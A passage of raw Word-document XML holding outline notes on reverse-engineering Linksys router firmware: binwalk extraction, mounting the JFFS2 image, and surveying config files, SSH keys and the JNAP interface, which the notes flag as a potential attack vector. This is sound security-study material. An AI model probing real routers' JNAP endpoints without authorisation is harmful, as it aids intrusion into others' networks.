        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>binwalk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD1DB3F" w14:textId="25480492" w:rsidR="00C52671" w:rsidRDefault="00C52671" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>checks for well known file signatures within a given file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E41B65" w14:textId="6B3AA002" w:rsidR="00C52671" w:rsidRDefault="00C52671" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>man binwalk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43194DD5" w14:textId="176496D0" w:rsidR="00C52671" w:rsidRDefault="00C52671" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>-e – extract files from firmware image</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FA7864" w14:textId="04EA4D21" w:rsidR="00C52671" w:rsidRDefault="00C52671" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>binwalk -e &lt;file&gt;.img</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9D8BBC" w14:textId="4943AFDC" w:rsidR="00C52671" w:rsidRDefault="00C52671" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>uImage Headers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BE6B5B" w14:textId="5386A945" w:rsidR="00C52671" w:rsidRDefault="00C52671" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>CRC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701899B9" w14:textId="6634675D" w:rsidR="00BA2889" w:rsidRDefault="00BA2889" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>image size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036E482F" w14:textId="77668C37" w:rsidR="00BA2889" w:rsidRDefault="00BA2889" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341E1FE1" w14:textId="6467D798" w:rsidR="00BA2889" w:rsidRDefault="00BA2889" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>JFFS2, gzip compressed data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC6C007" w14:textId="234A5F34" w:rsidR="00E71B4F" w:rsidRDefault="00E71B4F" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>cd into extracted folder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773316B8" w14:textId="3B05AFDA" w:rsidR="00E71B4F" w:rsidRDefault="00E71B4F" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>further files for strings and binwalk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6438199B" w14:textId="623FA04E" w:rsidR="00E71B4F" w:rsidRDefault="00E71B4F" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>continue strings/binwalk process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF5B710" w14:textId="5E919050" w:rsidR="00E71B4F" w:rsidRDefault="00E71B4F" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>search for hex, human readable text, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115A2841" w14:textId="13EC93DE" w:rsidR="00E71B4F" w:rsidRDefault="00E71B4F" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Mounting and Analysis of the Router’s Filesystem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F17A2C" w14:textId="5033217F" w:rsidR="00E71B4F" w:rsidRDefault="00E71B4F" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>JFFS2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2FDD86" w14:textId="77777777" w:rsidR="00E71B4F" w:rsidRDefault="00E71B4F" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">#Step 1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795247ED" w14:textId="77777777" w:rsidR="00E71B4F" w:rsidRDefault="00E71B4F" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>#If /dev/mtdblock0 exists, remove file/directory and re-create the block device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649E3EAA" w14:textId="77777777" w:rsidR="00E71B4F" w:rsidRDefault="00E71B4F" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>rm -rf /dev/mtdblock0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D6EB6F" w14:textId="77777777" w:rsidR="00E71B4F" w:rsidRDefault="00E71B4F" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>mknod /dev/mtdblock0 b 31 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4112B579" w14:textId="77777777" w:rsidR="00E71B4F" w:rsidRDefault="00E71B4F" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05C8CCFC" w14:textId="77777777" w:rsidR="00E71B4F" w:rsidRDefault="00E71B4F" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>#Step 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036C93DA" w14:textId="77777777" w:rsidR="00E71B4F" w:rsidRDefault="00E71B4F" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>#Create a location for the jffs2 filesysystem to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7770BD6D" w14:textId="77777777" w:rsidR="00E71B4F" w:rsidRDefault="00E71B4F" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>mkdir /mnt/jffs2_file/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1FF762" w14:textId="77777777" w:rsidR="00E71B4F" w:rsidRDefault="00E71B4F" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54623CF2" w14:textId="77777777" w:rsidR="00E71B4F" w:rsidRDefault="00E71B4F" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>#Step 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C901A7" w14:textId="77777777" w:rsidR="00E71B4F" w:rsidRDefault="00E71B4F" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>#Load required kernel modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55515987" w14:textId="77777777" w:rsidR="00E71B4F" w:rsidRDefault="00E71B4F" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>modprobe jffs2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE48588" w14:textId="77777777" w:rsidR="00E71B4F" w:rsidRDefault="00E71B4F" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>modprobe mtdram</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E3850D" w14:textId="77777777" w:rsidR="00E71B4F" w:rsidRDefault="00E71B4F" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>modprobe mtdblock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14742AFA" w14:textId="77777777" w:rsidR="00E71B4F" w:rsidRDefault="00E71B4F" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47A177D6" w14:textId="77777777" w:rsidR="00E71B4F" w:rsidRDefault="00E71B4F" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>#Step 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187F1D5E" w14:textId="77777777" w:rsidR="00E71B4F" w:rsidRDefault="00E71B4F" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>#Write image to /dev/mtdblock0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9663B5" w14:textId="1C3BB48E" w:rsidR="00E71B4F" w:rsidRDefault="00E71B4F" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>dd if=/</w:t>
      </w:r>
      <w:r w:rsidR="000375F9">
        <w:t>full path</w:t>
      </w:r>
      <w:r>
        <w:t>/600000.jffs2 of=/dev/mtdblock0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277BF850" w14:textId="77777777" w:rsidR="00E71B4F" w:rsidRDefault="00E71B4F" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59F1DB92" w14:textId="77777777" w:rsidR="00E71B4F" w:rsidRDefault="00E71B4F" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>#Step 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8146F5" w14:textId="77777777" w:rsidR="00E71B4F" w:rsidRDefault="00E71B4F" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>#Mount file system to folder location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308BF375" w14:textId="77777777" w:rsidR="00E71B4F" w:rsidRDefault="00E71B4F" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>mount -t jffs2 /dev/mtdblock0 /mnt/jffs2_file/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040789CD" w14:textId="77777777" w:rsidR="00E71B4F" w:rsidRDefault="00E71B4F" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="303E3D17" w14:textId="77777777" w:rsidR="00E71B4F" w:rsidRDefault="00E71B4F" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>#Finally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5498F72D" w14:textId="2DA864F5" w:rsidR="00E71B4F" w:rsidRDefault="00E71B4F" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>cd /mnt/jffs2_file/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3035C932" w14:textId="29BA597B" w:rsidR="00E71B4F" w:rsidRDefault="000375F9" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>parent folders, folders for http servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D078B76" w14:textId="797A6916" w:rsidR="000375F9" w:rsidRDefault="000375F9" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>typically empty because router is not up and running</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681E6488" w14:textId="55F136C9" w:rsidR="000375F9" w:rsidRDefault="000375F9" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>bin/busybox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CFA2D9" w14:textId="63FBDAD6" w:rsidR="000375F9" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId169" w:history="1">
        <w:r w:rsidR="000375F9" w:rsidRPr="005A459B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://ubuntuforums.org/archive/index.php/t-846852.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="42C5FFB5" w14:textId="394A6551" w:rsidR="000375F9" w:rsidRDefault="007F71D7" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>suite of common executable commands within the Unix environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761D9516" w14:textId="52D7E5B6" w:rsidR="007F71D7" w:rsidRDefault="007F71D7" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>database types within bin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F945A06" w14:textId="598ADAD5" w:rsidR="007F71D7" w:rsidRDefault="007F71D7" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>sqlite3 for example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFA0BC0" w14:textId="0574D9C8" w:rsidR="007F71D7" w:rsidRDefault="007F71D7" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>/etc/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED39164" w14:textId="3632442C" w:rsidR="007F71D7" w:rsidRDefault="007F71D7" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>contains config files for the router</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416E2885" w14:textId="5F102B08" w:rsidR="007F71D7" w:rsidRDefault="007F71D7" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Access Point power levels regulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4FB424" w14:textId="38CB7AAD" w:rsidR="007F71D7" w:rsidRDefault="007F71D7" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>FCC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712E0727" w14:textId="4CEFFB5E" w:rsidR="007F71D7" w:rsidRDefault="007F71D7" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>builddate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9D0E2E" w14:textId="2D8B1F97" w:rsidR="007F71D7" w:rsidRDefault="007F71D7" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ssh server information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D47A08C" w14:textId="63D1808E" w:rsidR="007F71D7" w:rsidRDefault="00612F8D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>dropbear_rsa_host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773DB521" w14:textId="199CB187" w:rsidR="00612F8D" w:rsidRDefault="00612F8D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>mediaserver.ini</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5356DE" w14:textId="30F5C604" w:rsidR="00612F8D" w:rsidRDefault="00612F8D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBA4485" w14:textId="4A6E744D" w:rsidR="00612F8D" w:rsidRDefault="002C2A3F" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>JNAP Folder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7083EB" w14:textId="7FECF183" w:rsidR="002C2A3F" w:rsidRDefault="002C2A3F" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>potential attack vector and vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFA389C" w14:textId="1B5F3D28" w:rsidR="002C2A3F" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId170" w:history="1">
        <w:r w:rsidR="002C2A3F" w:rsidRPr="005A459B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://routersecurity.org/hnap.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="21731A34" w14:textId="1DFEFC73" w:rsidR="002C2A3F" w:rsidRDefault="002C2A3F" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">going to </w:t>
      </w:r>
      <w:hyperlink w:history="1">
        <w:r w:rsidRPr="005A459B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://&lt;defaultgate&gt;/JNAP/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> on a linksys router reveals different 404</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A277BB4" w14:textId="6DE84962" w:rsidR="002C2A3F" w:rsidRDefault="002C2A3F" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>contents within JNAP/modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035421DA" w14:textId="24756920" w:rsidR="002C2A3F" w:rsidRDefault="002C2A3F" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>firewalls, http proxies, QoS, VPN Servers, uPnP, SMB, MAC filtering, FTP, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474EA5C0" w14:textId="37164F33" w:rsidR="002C2A3F" w:rsidRDefault="002C2A3F" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
